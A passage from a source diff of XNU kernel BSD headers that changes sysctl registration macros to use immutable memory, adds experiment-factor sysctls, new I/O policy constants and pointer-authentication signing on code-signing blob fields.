proc_lck_attr; +extern lck_attr_t proc_lck_attr; +extern lck_grp_t proc_fdmlock_grp; +extern lck_grp_t proc_lck_grp; +extern lck_grp_t proc_kqhashlock_grp; +extern lck_grp_t proc_knhashlock_grp; +extern lck_grp_t proc_slock_grp; +extern lck_grp_t proc_mlock_grp; +extern lck_grp_t proc_ucred_mlock_grp; +extern lck_grp_t proc_dirslock_grp; LIST_HEAD(proclist, proc); extern struct proclist allproc; /* List of all processes. */ @@ -920,4 +922,10 @@ extern zone_t proc_sigacts_zone; extern struct proc_ident proc_ident(proc_t p); +/* + * True if the process ignores file permissions in case it owns the + * file/directory + */ +bool proc_ignores_node_permissions(proc_t proc); + #endif /* !_SYS_PROC_INTERNAL_H_ */ diff --git a/bsd/sys/pthread_shims.h b/bsd/sys/pthread_shims.h index e956225b2..1d28e90f9 100644 --- a/bsd/sys/pthread_shims.h +++ b/bsd/sys/pthread_shims.h @@ -202,7 +202,7 @@ typedef const struct pthread_callbacks_s { /* osfmk/vm/vm_map.h */ kern_return_t (*vm_map_page_info)(vm_map_t map, vm_map_offset_t offset, vm_page_info_flavor_t flavor, vm_page_info_t info, mach_msg_type_number_t *count); - void *__unused_was_vm_map_switch; + mach_port_name_t (*ipc_port_copyout_send_pinned)(ipc_port_t sright, ipc_space_t space); /* wq functions */ kern_return_t (*thread_set_wq_state32)(thread_t thread, thread_state_t state); @@ -291,14 +291,14 @@ typedef const struct pthread_callbacks_s { uint16_t (*thread_set_tag)(thread_t thread, uint16_t tag); uint16_t (*thread_get_tag)(thread_t thread); - void *__unused_was_proc_usynch_thread_qos_squash_override_for_resource; - void *__unused_was_task_get_default_manager_qos; - void *__unused_was_thread_create_workq_waiting; + kern_return_t (*thread_create_pinned)(task_t parent_task, thread_t *new_thread); + kern_return_t (*thread_terminate_pinned)(thread_t thread); + ipc_port_t (*convert_thread_to_port_pinned)(thread_t th); user_addr_t (*proc_get_stack_addr_hint)(struct proc *p); void (*proc_set_stack_addr_hint)(struct proc *p, 
user_addr_t stack_addr_hint); - void *__unused_was_proc_get_return_to_kernel_offset; + kern_return_t (*thread_create_immovable)(task_t parent_task, thread_t *new_thread); void (*proc_set_return_to_kernel_offset)(struct proc *t, uint64_t offset); void *__unused_was_workloop_fulfill_threadreq; diff --git a/bsd/sys/quota.h b/bsd/sys/quota.h index 08fcfd7ac..cecc86d70 100644 --- a/bsd/sys/quota.h +++ b/bsd/sys/quota.h @@ -353,7 +353,6 @@ void dqfileclose(struct quotafile *, int); void dqflush(struct vnode *); int dqget(u_int32_t, struct quotafile *, int, struct dquot **); void dqhashinit(void); -void dqinit(void); int dqisinitialized(void); void dqref(struct dquot *); void dqrele(struct dquot *); diff --git a/bsd/sys/resource.h b/bsd/sys/resource.h index b3baf8421..e3b86028a 100644 --- a/bsd/sys/resource.h +++ b/bsd/sys/resource.h @@ -547,6 +547,8 @@ struct proc_rlimit_control_wakeupmon { #define IOPOL_TYPE_VFS_STATFS_NO_DATA_VOLUME 4 #define IOPOL_TYPE_VFS_TRIGGER_RESOLVE 5 #define IOPOL_TYPE_VFS_IGNORE_CONTENT_PROTECTION 6 +#define IOPOL_TYPE_VFS_IGNORE_PERMISSIONS 7 +#define IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE 8 /* scope */ #define IOPOL_SCOPE_PROCESS 0 @@ -586,6 +588,12 @@ struct proc_rlimit_control_wakeupmon { #define IOPOL_VFS_CONTENT_PROTECTION_DEFAULT 0 #define IOPOL_VFS_CONTENT_PROTECTION_IGNORE 1 +#define IOPOL_VFS_IGNORE_PERMISSIONS_OFF 0 +#define IOPOL_VFS_IGNORE_PERMISSIONS_ON 1 + +#define IOPOL_VFS_SKIP_MTIME_UPDATE_OFF 0 +#define IOPOL_VFS_SKIP_MTIME_UPDATE_ON 1 + #ifdef PRIVATE /* * Structures for use in communicating via iopolicysys() between Libc and the diff --git a/bsd/sys/sbuf.h b/bsd/sys/sbuf.h index a86f6f765..2c3544bf8 100644 --- a/bsd/sys/sbuf.h +++ b/bsd/sys/sbuf.h @@ -74,12 +74,6 @@ int sbuf_done(struct sbuf *); void sbuf_delete(struct sbuf *); #endif -#ifdef KERNEL -struct uio; -struct sbuf *sbuf_uionew(struct sbuf *, struct uio *, int *); -int sbuf_bcopyin(struct sbuf *, const void *, size_t); -int sbuf_copyin(struct sbuf *, const void *, 
size_t); -#endif __END_DECLS #endif diff --git a/bsd/sys/select.h b/bsd/sys/select.h index 2fb516833..27ad0c3c2 100644 --- a/bsd/sys/select.h +++ b/bsd/sys/select.h @@ -139,6 +139,10 @@ extern int selwait; void selrecord(proc_t selector, struct selinfo *, void *); void selwakeup(struct selinfo *); void selthreadclear(struct selinfo *); +#if XNU_KERNEL_PRIVATE +struct _select; +void select_cleanup_uthread(struct _select *); +#endif __END_DECLS diff --git a/bsd/sys/semaphore.h b/bsd/sys/semaphore.h index b55852012..7dc1085fd 100644 --- a/bsd/sys/semaphore.h +++ b/bsd/sys/semaphore.h @@ -62,7 +62,6 @@ int sem_wait(sem_t *) __DARWIN_ALIAS_C(sem_wait); __END_DECLS #else /* KERNEL */ -void psem_lock_init(void); void psem_cache_init(void); #endif /* KERNEL */ diff --git a/bsd/sys/socketvar.h b/bsd/sys/socketvar.h index c5124169a..c1e664187 100644 --- a/bsd/sys/socketvar.h +++ b/bsd/sys/socketvar.h @@ -85,6 +85,9 @@ #include #endif /* BSD_KERNEL_PRIVATE */ #endif /* KERNEL_PRIVATE */ +#if !KERNEL +#include +#endif typedef u_quad_t so_gen_t; @@ -433,7 +436,7 @@ struct xsocket { uid_t so_uid; /* XXX */ }; -#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) +#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) struct xsocket64 { u_int32_t xso_len; /* length of this structure */ u_int64_t xso_so; /* makes a convenient handle */ @@ -455,7 +458,7 @@ struct xsocket64 { struct xsockbuf so_snd; uid_t so_uid; /* XXX */ }; -#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ +#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ #ifdef PRIVATE #define XSO_SOCKET 0x001 diff --git a/bsd/sys/sysctl.h b/bsd/sys/sysctl.h index 74a04166b..c686d328a 100644 --- a/bsd/sys/sysctl.h +++ b/bsd/sys/sysctl.h @@ -83,19 +83,18 @@ #include #include #else -#ifndef XNU_KERNEL_PRIVATE +#ifdef XNU_KERNEL_PRIVATE +#include +#include +#else #include #include -#endif +#endif /* XNU_KERNEL_PRIVATE */ 
+#endif /* KERNEL */ -#endif #include #include -#ifdef XNU_KERNEL_PRIVATE -#include -#endif - /* * Definitions for sysctl call. The sysctl call uses a hierarchical name * for objects that can be examined or modified. The name is expressed as @@ -146,25 +145,29 @@ struct ctlname { int ctl_type; /* type of name */ }; -#define CTLTYPE 0xf /* Mask for the type */ -#define CTLTYPE_NODE 1 /* name is a node */ -#define CTLTYPE_INT 2 /* name describes an integer */ -#define CTLTYPE_STRING 3 /* name describes a string */ -#define CTLTYPE_QUAD 4 /* name describes a 64-bit number */ -#define CTLTYPE_OPAQUE 5 /* name describes a structure */ -#define CTLTYPE_STRUCT CTLTYPE_OPAQUE /* name describes a structure */ - -#define CTLFLAG_RD 0x80000000 /* Allow reads of variable */ -#define CTLFLAG_WR 0x40000000 /* Allow writes to the variable */ -#define CTLFLAG_RW (CTLFLAG_RD|CTLFLAG_WR) -#define CTLFLAG_NOLOCK 0x20000000 /* XXX Don't Lock */ -#define CTLFLAG_ANYBODY 0x10000000 /* All users can set this var */ -#define CTLFLAG_SECURE 0x08000000 /* Permit set only if securelevel<=0 */ -#define CTLFLAG_MASKED 0x04000000 /* deprecated variable, do not display */ -#define CTLFLAG_NOAUTO 0x02000000 /* do not auto-register */ -#define CTLFLAG_KERN 0x01000000 /* valid inside the kernel */ -#define CTLFLAG_LOCKED 0x00800000 /* node will handle locking itself */ -#define CTLFLAG_OID2 0x00400000 /* struct sysctl_oid has version info */ +#define CTLTYPE 0xf /* Mask for the type */ +#define CTLTYPE_NODE 1 /* name is a node */ +#define CTLTYPE_INT 2 /* name describes an integer */ +#define CTLTYPE_STRING 3 /* name describes a string */ +#define CTLTYPE_QUAD 4 /* name describes a 64-bit number */ +#define CTLTYPE_OPAQUE 5 /* name describes a structure */ +#define CTLTYPE_STRUCT CTLTYPE_OPAQUE /* name describes a structure */ + +#define CTLFLAG_RD 0x80000000 /* Allow reads of variable */ +#define CTLFLAG_WR 0x40000000 /* Allow writes to the variable */ +#define CTLFLAG_RW (CTLFLAG_RD|CTLFLAG_WR) 
+#define CTLFLAG_NOLOCK 0x20000000 /* XXX Don't Lock */ +#define CTLFLAG_ANYBODY 0x10000000 /* All users can set this var */ +#define CTLFLAG_SECURE 0x08000000 /* Permit set only if securelevel<=0 */ +#define CTLFLAG_MASKED 0x04000000 /* deprecated variable, do not display */ +#define CTLFLAG_NOAUTO 0x02000000 /* do not auto-register */ +#define CTLFLAG_KERN 0x01000000 /* valid inside the kernel */ +#define CTLFLAG_LOCKED 0x00800000 /* node will handle locking itself */ +#define CTLFLAG_OID2 0x00400000 /* struct sysctl_oid has version info */ +#if XNU_KERNEL_PRIVATE +#define CTLFLAG_PERMANENT 0x00200000 /* permanent sysctl_oid */ +#endif +#define CTLFLAG_EXPERIMENT 0x00100000 /* Allows writing w/ the trial experiment entitlement. */ /* * USE THIS instead of a hardwired number from the categories below @@ -179,11 +182,22 @@ struct ctlname { * in I/O-Kit. In this case, you have to call sysctl_register_oid() * manually - just like in a KEXT. */ -#define OID_AUTO (-1) -#define OID_AUTO_START 100 /* conventional */ +#define OID_AUTO (-1) +#if XNU_KERNEL_PRIVATE +/* + * Used to allow for most of the core kernel sysctl OIDs to be in immutable + * memory. The nodes that can be extensible have a fake first node with this + * particular oid_number which hangs a second mutable list from this node. 
+ * + * This node is always first when it is used + */ +#define OID_MUTABLE_ANCHOR (INT_MIN) +#endif +#define OID_AUTO_START 100 /* conventional */ #ifdef KERNEL -#define SYSCTL_HANDLER_ARGS (struct sysctl_oid *oidp, void *arg1, int arg2, \ +#define SYSCTL_HANDLER_ARGS \ + (struct sysctl_oid *oidp __unused, void *arg1 __unused, int arg2 __unused, \ struct sysctl_req *req) @@ -286,7 +300,6 @@ int sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int void sysctl_register_oid(struct sysctl_oid *oidp); void sysctl_unregister_oid(struct sysctl_oid *oidp); -void sysctl_load_devicetree_entries(void); #define nvram_osenvironment "osenvironment" void sysctl_set_osenvironment(unsigned int size, const void* value); void sysctl_unblock_osenvironment(void); @@ -300,11 +313,6 @@ __END_DECLS #define SYSCTL_DECL(name) \ extern struct sysctl_oid_list sysctl_##name##_children -#ifdef XNU_KERNEL_PRIVATE -#define SYSCTL_LINKER_SET_ENTRY LINKER_SET_ENTRY -#else -#define SYSCTL_LINKER_SET_ENTRY(a, b) -#endif /* * Macros to define sysctl entries. Which to use? Pure data that are * returned without modification, SYSCTL_ is for you, like @@ -334,65 +342,172 @@ __END_DECLS /* This constructs a "raw" MIB oid. 
*/ -#define SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ - { \ - &sysctl_##parent##_children, { NULL }, \ - nbr, (int)(kind|CTLFLAG_OID2), a1, (int)(a2), #name, handler, fmt, descr, SYSCTL_OID_VERSION, 0 \ +#define SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, fn, fmt, desc) { \ + .oid_parent = &sysctl_##parent##_children, \ + .oid_number = nbr, \ + .oid_kind = (int)(kind | CTLFLAG_OID2), \ + .oid_arg1 = a1, \ + .oid_arg2 = (int)(a2), \ + .oid_name = #name, \ + .oid_handler = fn, \ + .oid_fmt = fmt, \ + .oid_descr = desc, \ + .oid_version = SYSCTL_OID_VERSION, \ } +#define __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ + struct sysctl_oid sysctl_##parent##_##name = SYSCTL_STRUCT_INIT(\ + parent, nbr, name, kind, a1, a2, handler, fmt, descr) + +#if XNU_KERNEL_PRIVATE + +/* + * Core kernel registers sysctls before lockdown and protects those entries + * in immutable memory. + * + * When a node needs to support dynamic extension after lockdown, it needs to be + * declared with SYSCTL_EXTENSIBLE_NODE() to insert a dummy "OID_MUTABLE_ANCHOR" + * node in this node chain which will allow extensibility. + * + * OIDs that are to be inserted dynamically based on system properties that + * aren't known at compile time, have three options, in increasing order of + * unsafety: + * + * - The OID can use the CTLFLAG_NOAUTO flag. Such entries aren't inserted to + * the sysctl tree automatically but will be made read-only at lock down. + * + * Such entries must be inserted in the STARTUP_SUB_SYSCTL "Middle" phase + * using sysctl_register_oid_early(). + * + * - The OID can be always registered and test whether it is ready to operate. + * When it is not, it must return ENOENT which simulates an absent entry. + * + * This however has the downside that the entry is still resolvable as an MIB + * or listed in `sysctl -a` when it isn't masked. 
+ * + * This is acceptable for sysctls that will become valid quickly during boot + * (but after lockdown). + * + * - SYSCTL_OID_MANUAL / SYSCTL_NODE_MANUAL can be used for completely + * dynamic/manual oid registration. Such nodes must be registered with + * sysctl_register_oid() after lockdown. + * + * This is the least preferred solution. + */ + +__BEGIN_DECLS +void sysctl_register_oid_early(struct sysctl_oid *oidp); +__END_DECLS + +#define SYSCTL_OID_MANUAL(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ + __XNU_PRIVATE_EXTERN \ + __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) + +#define SYSCTL_NODE_MANUAL(parent, nbr, name, access, handler, descr) \ + struct sysctl_oid_list sysctl_##parent##_##name##_children; \ + __XNU_PRIVATE_EXTERN \ + __SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access, \ + &sysctl_##parent##_##name##_children, 0, handler, "N", descr); + +#define SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ + __security_const_late __XNU_PRIVATE_EXTERN \ + __SYSCTL_OID(parent, nbr, name, CTLFLAG_PERMANENT|kind, \ + a1, a2, handler, fmt, descr); \ + __STARTUP_ARG(sysctl_##parent, _##name, \ + SYSCTL, STARTUP_RANK_SECOND, sysctl_register_oid_early, \ + &sysctl_##parent##_##name) + +#define __SYSCTL_NODE(parent, nbr, name, access, handler, descr) \ + __security_const_late \ + struct sysctl_oid_list sysctl_##parent##_##name##_children; \ + __security_const_late __XNU_PRIVATE_EXTERN \ + __SYSCTL_OID(parent, nbr, name, CTLFLAG_PERMANENT|CTLTYPE_NODE|access, \ + &sysctl_##parent##_##name##_children, 0, handler, "N", descr); \ + __STARTUP_ARG(sysctl_##parent, _##name, \ + SYSCTL, STARTUP_RANK_FIRST, sysctl_register_oid_early, \ + &sysctl_##parent##_##name) + +#define __SYSCTL_EXTENSION_NODE(name) \ + static __security_read_write \ + struct sysctl_oid_list sysctl_##name##_children_mutable; \ + static __security_const_late \ + struct sysctl_oid sysctl_##name##_wranchor = { \ + .oid_parent = &sysctl_##name##_children, 
\ + .oid_number = OID_MUTABLE_ANCHOR, \ + .oid_kind = CTLFLAG_OID2 | CTLFLAG_PERMANENT, \ + .oid_arg1 = &sysctl_##name##_children_mutable, \ + .oid_name = "__anchor__(" #name ")", \ + .oid_version = SYSCTL_OID_VERSION, \ + }; \ + __STARTUP_ARG(sysctl_##name, _wranchor, \ + SYSCTL, STARTUP_RANK_LAST, sysctl_register_oid_early, \ + &sysctl_##name##_wranchor) + +#define SYSCTL_NODE(parent, nbr, name, access, handler, descr) \ + __XNU_PRIVATE_EXTERN \ + __SYSCTL_NODE(parent, nbr, name, access, handler, descr) + +#define SYSCTL_EXTENSIBLE_NODE(parent, nbr, name, access, handler, descr) \ + __SYSCTL_NODE(parent, nbr, name, access, handler, descr); \ + __SYSCTL_EXTENSION_NODE(parent##_##name) +#else #define SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) \ - struct sysctl_oid sysctl_##parent##_##name = SYSCTL_STRUCT_INIT(parent, nbr, name, kind, a1, a2, handler, fmt, descr); \ - SYSCTL_LINKER_SET_ENTRY(__sysctl_set, sysctl_##parent##_##name) + __SYSCTL_OID(parent, nbr, name, kind, a1, a2, handler, fmt, descr) /* This constructs a node from which other oids can hang. */ -#define SYSCTL_NODE(parent, nbr, name, access, handler, descr) \ - struct sysctl_oid_list sysctl_##parent##_##name##_children; \ - SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access, \ - (void*)&sysctl_##parent##_##name##_children, 0, handler, \ - "N", descr) +#define SYSCTL_NODE(parent, nbr, name, access, handler, descr) \ + struct sysctl_oid_list sysctl_##parent##_##name##_children; \ + SYSCTL_OID(parent, nbr, name, CTLTYPE_NODE|access, \ + &sysctl_##parent##_##name##_children, 0, handler, "N", descr) +#endif /* XNU_KERNEL_PRIVATE */ /* Oid for a string. len can be 0 to indicate '\0' termination. 
*/ #define SYSCTL_STRING(parent, nbr, name, access, arg, len, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_STRING|access, \ - arg, len, sysctl_handle_string, "A", descr) + arg, len, sysctl_handle_string, "A", descr) #define SYSCTL_COMPAT_INT(parent, nbr, name, access, ptr, val, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, val, sysctl_handle_int, "I", descr) + ptr, val, sysctl_handle_int, "I", descr) #define SYSCTL_COMPAT_UINT(parent, nbr, name, access, ptr, val, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, val, sysctl_handle_int, "IU", descr) + ptr, val, sysctl_handle_int, "IU", descr) /* Oid for an int. If ptr is NULL, val is returned. */ #define SYSCTL_INT(parent, nbr, name, access, ptr, val, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, val, sysctl_handle_int, "I", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(int)) ? 0 : -1] + ptr, val, sysctl_handle_int, "I", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(int), \ + "must be integer sized"); /* Oid for an unsigned int. If ptr is NULL, val is returned. */ #define SYSCTL_UINT(parent, nbr, name, access, ptr, val, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, val, sysctl_handle_int, "IU", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned int)) ? 0 : -1] + ptr, val, sysctl_handle_int, "IU", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned int), \ + "must be integer sized"); /* Oid for a long. The pointer must be non NULL. */ #define SYSCTL_LONG(parent, nbr, name, access, ptr, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, 0, sysctl_handle_long, "L", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long)) ? 
0 : -1] + ptr, 0, sysctl_handle_long, "L", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long), \ + "must be long sized"); /* Oid for a unsigned long. The pointer must be non NULL. */ #define SYSCTL_ULONG(parent, nbr, name, access, ptr, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_INT|access, \ - ptr, 0, sysctl_handle_long, "LU", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned long)) ? 0 : -1] + ptr, 0, sysctl_handle_long, "LU", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(unsigned long), \ + "must be long sized"); /* Oid for a quad. The pointer must be non NULL. */ #define SYSCTL_QUAD(parent, nbr, name, access, ptr, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_QUAD|access, \ - ptr, 0, sysctl_handle_quad, "Q", descr); \ - typedef char _sysctl_##parent##_##name##_size_check[(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long long)) ? 0 : -1] + ptr, 0, sysctl_handle_quad, "Q", descr); \ + _Static_assert(__builtin_constant_p(ptr) || sizeof(*(ptr)) == sizeof(long long), \ + "must be long long sized"); /* Oid for an opaque object. Specified by a pointer and a length. */ #define SYSCTL_OPAQUE(parent, nbr, name, access, ptr, len, fmt, descr) \ @@ -402,8 +517,8 @@ __END_DECLS /* Oid for a struct. Specified by a pointer and a type. */ #define SYSCTL_STRUCT(parent, nbr, name, access, ptr, type, descr) \ SYSCTL_OID(parent, nbr, name, CTLTYPE_OPAQUE|access, \ - ptr, sizeof(struct type), sysctl_handle_opaque, \ - "S," #type, descr) + ptr, sizeof(struct type), sysctl_handle_opaque, \ + "S," #type, descr) /* * Oid for a procedure. Specified by a pointer and an arg. 
@@ -412,8 +527,111 @@ __END_DECLS */ #define SYSCTL_PROC(parent, nbr, name, access, ptr, arg, handler, fmt, descr) \ SYSCTL_OID(parent, nbr, name, access, \ - ptr, arg, handler, fmt, descr) + ptr, arg, handler, fmt, descr) + +/* + * The EXPERIMENT macros below expose values for on-device experimentation (A/B testing) via Trial. + * These values will be set shortly after boot by the KRExperiments framework based on any + * active experiments on the device. + * Values exposed via these macros are still normal sysctls and can be set by the superuser in the + * development or debug kernel. However, on the release kernel they can ONLY be set by processes + * with the com.apple.private.write-kr-experiment-factors entitlement. + * In addition, for numeric types, special macros are provided that enforce a valid range for the value (inclusive) + * to ensure that an errant experiment can't set a totally unexpected value. These macros also track which + * values have been modified via sysctl(3) so that they can be inspected with the showexperiments lldb macro. + */ + +struct experiment_spec { + void *ptr; /* ptr to numeric experiment factor. */ + uint64_t min_value; /* Min value that can be set via sysctl(3) (inclusive). */ + uint64_t max_value; /* Max value that can be set via sysctl(3) (inclusive). */ + uint64_t original_value; /* First value that was overwritten via sysctl(3). */ + _Atomic bool modified; /* Has this value ever been overwritten via sysctl(3)? */ +}; + +/* + * The handlers for the numeric types can be easily parameterized by type. + * So they're defined via an X macro. 
+ */ +#define experiment_factor_numeric_types \ + X(uint, unsigned int) \ + X(int, int) \ + X(ulong, unsigned long) \ + X(long, long) \ + X(uint64, uint64_t) \ + X(int64, int64_t) + +#define X(experiment_factor_typename, _) \ +int experiment_factor_##experiment_factor_typename##_handler SYSCTL_HANDLER_ARGS; + +experiment_factor_numeric_types +#undef X + +#define __EXPERIMENT_FACTOR_SPEC(parent, name, p, min, max) \ + struct experiment_spec experiment_##parent##_##name = { \ + .ptr = p, \ + .min_value = min, \ + .max_value = max, \ + .original_value = 0, \ + .modified = false \ + } + +#define EXPERIMENT_FACTOR_UINT(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(unsigned int), "must be integer sized"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_uint_handler, "IU", descr); + +#define EXPERIMENT_FACTOR_INT(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(int), "must be integer sized"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_int_handler, "I", descr); + +#define EXPERIMENT_FACTOR_ULONG(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(unsigned long), "must be long sized"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_ulong_handler, "LU", descr); +#define EXPERIMENT_FACTOR_LONG(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(long), "must be long sized"); \ + 
SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_long_handler, "L", descr); + +#define EXPERIMENT_FACTOR_UINT64(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(uint64_t), "must be 8 bytes"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_uint64_handler, "QU", descr); + +#define EXPERIMENT_FACTOR_INT64(parent, name, ptr, min, max, descr) \ + __EXPERIMENT_FACTOR_SPEC(parent, name, ptr, min, max); \ + _Static_assert(sizeof(*(ptr)) == sizeof(int64_t), "must be 8 bytes"); \ + SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &experiment_##parent##_##name, 1, &experiment_factor_int64_handler, "Q", descr); + +/* + * Calls a user-provided handler to read / write this factor. + * Entitlement checking will still be done by sysctl, but it's the caller's responsibility to validate any new values. + * This factor will not be printed out via the showexperiments lldb macro. + */ +#define EXPERIMENT_FACTOR_PROC(parent, name, access, ptr, arg, handler, fmt, descr) \ + _Static_assert((arg) != 1, "arg can not be 1"); \ + SYSCTL_PROC(parent, OID_AUTO, name, access | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, ptr, arg, handler, fmt, descr); + +#ifdef XNU_KERNEL_PRIVATE +/* + * Sysctl handler for reading a simple counter. + * Using this directly is not recommended. Use the SYSCTL_SCALABLE_COUNTER macro + */ +int scalable_counter_sysctl_handler SYSCTL_HANDLER_ARGS; + +/*! + * @macro SYSCTL_SCALABLE_COUNTER + * + * @abstract + * Provides a sysctl for reading the value of a percpu counter. 
+ */ +#define SYSCTL_SCALABLE_COUNTER(parent, name, counter, descr) \ +SYSCTL_PROC(parent, OID_AUTO, name, CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED, \ + (void *)(&counter), 0, &scalable_counter_sysctl_handler, "Q", descr); +#endif /* XNU_KERNEL_PRIVATE */ extern struct sysctl_oid_list sysctl__children; SYSCTL_DECL(_kern); @@ -1172,16 +1390,8 @@ extern char macosproductversion[]; extern char macosversion[]; #endif -struct linker_set; - -void sysctl_register_set(const char *set); -void sysctl_unregister_set(const char *set); void sysctl_mib_init(void); - -int sysctl_int(user_addr_t, size_t *, user_addr_t, size_t, int *); -int sysctl_quad(user_addr_t, size_t *, user_addr_t, size_t, quad_t *); - -void sysctl_early_init(void); +void hvg_bsd_init(void); #endif /* BSD_KERNEL_PRIVATE */ #else /* !KERNEL */ diff --git a/bsd/sys/systm.h b/bsd/sys/systm.h index 8066c95f8..ee460934b 100644 --- a/bsd/sys/systm.h +++ b/bsd/sys/systm.h @@ -232,7 +232,8 @@ uint32_t throttle_lowpri_io(int sleep_amount); /* returns TRUE if the throttle_lowpri_io called with the same sleep_amount would've slept */ int throttle_lowpri_io_will_be_throttled(int sleep_amount); void throttle_set_thread_io_policy(int policy); -int throttle_get_thread_effective_io_policy(void); +int throttle_get_thread_effective_io_policy(void); +int throttle_thread_io_tier_above_metadata(void); typedef struct __throttle_info_handle *throttle_info_handle_t; int throttle_info_ref_by_mask(uint64_t throttle_mask, throttle_info_handle_t *throttle_info_handle); diff --git a/bsd/sys/tty.h b/bsd/sys/tty.h index b849f3aeb..2fdf66a4c 100644 --- a/bsd/sys/tty.h +++ b/bsd/sys/tty.h @@ -336,6 +336,11 @@ extern void ttyhold(struct tty *tp); #define PTS_MAJOR 4 #define PTC_MAJOR 5 +/* + * If you need accounting consider using + * KALLOC_HEAP_DEFINE to define a view. 
+ */ +#define KM_TTYS KHEAP_DEFAULT #endif /* defined(XNU_KERNEL_PRIVATE) */ __END_DECLS diff --git a/bsd/sys/ubc_internal.h b/bsd/sys/ubc_internal.h index 50f97527a..562a3e20e 100644 --- a/bsd/sys/ubc_internal.h +++ b/bsd/sys/ubc_internal.h @@ -109,7 +109,7 @@ struct cs_blob { off_t csb_end_offset; /* Blob coverage area end, from csb_base_offset */ vm_size_t csb_mem_size; vm_offset_t csb_mem_offset; - vm_address_t csb_mem_kaddr; + void * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_mem_kaddr") csb_mem_kaddr; unsigned char csb_cdhash[CS_CDHASH_LEN]; ptrauth_generic_signature_t csb_cdhash_signature; const struct cs_hash *csb_hashtype; @@ -125,6 +125,7 @@ struct cs_blob { char * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_supplement_teamid") csb_supplement_teamid; #endif const CS_GenericBlob * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_entitlements_blob") csb_entitlements_blob; /* raw blob, subrange of csb_mem_kaddr */ + ptrauth_generic_signature_t csb_entitlements_blob_signature; void * XNU_PTRAUTH_SIGNED_PTR("cs_blob.csb_entitlements") csb_entitlements; /* The entitlements as an OSDictionary */ unsigned int csb_signer_type; unsigned int csb_reconstituted; /* signature has potentially been modified after 